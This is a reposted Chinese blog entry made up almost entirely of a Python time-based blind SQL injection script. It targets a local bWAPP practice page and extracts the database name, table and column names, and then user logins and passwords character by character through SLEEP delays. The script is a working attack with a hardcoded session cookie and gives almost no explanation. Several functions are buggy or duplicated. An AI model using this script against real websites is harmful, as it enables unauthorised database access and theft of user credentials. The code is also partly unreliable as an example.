sql注入----sql injection script
2022/7/12 2:20:08
本文主要是介绍sql注入----sql injection script,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
import requests import time import yaml HEADER={ "cookie":"PHPSESSID=mgmbi0f5munhthiqfrvbmg73v1; security_level=0" } BASE_URL='http://localhost/bWAPP/app/sqli_15.php' config_path = "E:/Django/hhPro/yamls/sqlBlindInjection.yaml" # 读取test.yaml文件 with open(config_path, "r") as file: data = yaml.load(file.read()) student1 = data["BLINDSQL"]["SQL1"] #print(student1) def get_database_name_length(a,b)->int: count=0 #title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search if a[-1]!="?": a=a+"?" for i in range(1,100): url=a+b.format(i) start_time = time.time() print(url) requests.get(url,headers=HEADER) if time.time() - start_time > 2: print("盲注数据库名长度为{}".format(i)) count = i return count return count #获得盲注的数据库长度 def get_database_name()->int: count=0 #title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search for i in range(1,100): url=BASE_URL+"?title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(2) -- &action=search".format(i) start_time = time.time() requests.get(url,headers=HEADER) if time.time() - start_time > 2: print("盲注数据库名长度为{}".format(i)) count = i return count return count #获得盲注的数据库名称 def get_database_table(count): #mmp=get_database_name() x="" for i in range(1,count+1): for m in range(33,127): url=BASE_URL+"?title=Iron Man' AND ord(mid(DATABASE(),{},1))={} and SLEEP(2) -- &action=search".format(i,m) start_time = time.time() requests.get(url, headers=HEADER) if time.time() - start_time > 2: x=x+chr(m) print("盲注数据库名长度为{}".chr(m)) break print("打印数据库名称"+x) #获得数据库此库下面表数量 def get_table_count()->int: for i in range(1,100): url=BASE_URL+"?title=Iron Man' and "+student1+"={}".format(i)+" -- &action=search" start_time=time.time() requests.get(url,headers=HEADER) if time.time()-start_time>2: count =i print("打印当前数据库下面表数量{}"+str(count)) break return count #获得每个数据库表名的长度 def get_table_counts(counts)->int: for i in range(counts + 1): for m in range(1,100): url=BASE_URL+"?title=Iron Man' and (select length(table_name) from information_schema.tables where table_schema=database() limit {},1)={}" \ " and sleep(2) -- &action=search".format(i,m) start_time=time.time() requests.get(url,headers=HEADER) if time.time()-start_time>2: print("打印当前表名长度{}".format(m)) get_database_tabless(i, m) break return m #获得所有数据库的表名 def get_database_tabless(index,count): x="" for i in range(1,count+1): for m in range(33,127): url=BASE_URL+"?title=Iron Man' AND " \ "ascii(substr((select table_name from information_schema.tables " \ "where table_schema=database() limit {},1),{},1))={}" \ " and sleep(2) -- &action=search".format(index,i,m) #上面的意思是select括号里面,获得表的长度(第一个表),substr('str',1,1)然后来判断第一个表的字符是什么 start_time = time.time() requests.get(url, headers=HEADER) if time.time() - start_time > 2: x=x+chr(m) break print("打印数据库名称{}" + x) x="" return x #根据打印结果,想需要users表里面的列总数 def get_table_count()->int: count=0 #select count(column_name) from information_schema.columns where table_name='users' 统计users表中有多少个字段 for i in range(1,100): url=BASE_URL+"?title=Iron Man' AND (select count(column_name) from information_schema.columns where table_name='users')={} " \ "AND SLEEP(2) -- &action=search".format(i) start_time = time.time() requests.get(url,headers=HEADER) if time.time() - start_time > 2: print("盲注数据库中users表列数量为:{}".format(i)) count = i return count return count #获得users表中列名的长度 def get_table_nameNumber(count): for i in range(count+1): for j in range(100): url=BASE_URL+"?title=Iron Man' AND (select length(column_name) from information_schema.columns where table_name='users' limit {},1)={} " \ "AND SLEEP(2) -- &action=search".format(i,j) start_time = time.time() requests.get(url, headers=HEADER) if time.time() - start_time > 2: get_column_name_of(i,j) print("user表,字段长度为{}".format(j)) break #获取每个字段的名称 def get_column_name_of(index,count): for i in range(count+1): for j in range(33,127): url=BASE_URL+"?title=Iron Man' AND " \ "ascii(substr(select column_name form information_schema.columns where table_name='user'),{},1)={} " \ "AND SLEEP(2) -- &action=search".format(index,i,j) start_time = time.time() requests.get(url, headers=HEADER) if time.time() - start_time > 2: print(chr(j)) break #获得所需字段的用户名跟密码 def get_username_password(): values="" for i in range(100): for j in range(33,127): url=BASE_URL+"?title=Iron Man' AND ascii(substr((select concat(login,',',password) from users limit 0,1),{},1))={} " \ "AND SLEEP(2) -- &action=search".format(i,j) start_time = time.time() requests.get(url, headers=HEADER) if time.time() - start_time > 2: values=values+chr(j) break print(values) values="" 备注:盲注的时候一般使用and if __name__=='__main__': #get_table_counts(get_table_count()) #get_database_table(get_database_name()) #get_table_counts(get_table_count()) #get_table_count() #get_table_count()#打印users表中总列数量 get_username_password()#打印需要的日志 userAgent:浏览器访问要求,可以绕过最简单的内容,单引号判断sql注入
这篇关于sql注入----sql injection script的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-15PingCAP 黄东旭参与 CCF 秀湖会议,共探开源教育未来
- 2024-05-13PingCAP 戴涛:构建面向未来的金融核心系统
- 2024-05-09flutter3.x_macos桌面os实战
- 2024-05-09Rust中的并发性:Sync 和 Send Traits
- 2024-05-08使用Ollama和OpenWebUI在CPU上玩转Meta Llama3-8B
- 2024-05-08完工标准(DoD)与验收条件(AC)究竟有什么不同?
- 2024-05-084万 star 的 NocoDB 在 sealos 上一键起,轻松把数据库编程智能表格
- 2024-05-08Mac 版Stable Diffusion WebUI的安装
- 2024-05-08解锁CodeGeeX智能问答中3项独有的隐藏技能
- 2024-05-08RAG算法优化+新增代码仓库支持,CodeGeeX的@repo功能效果提升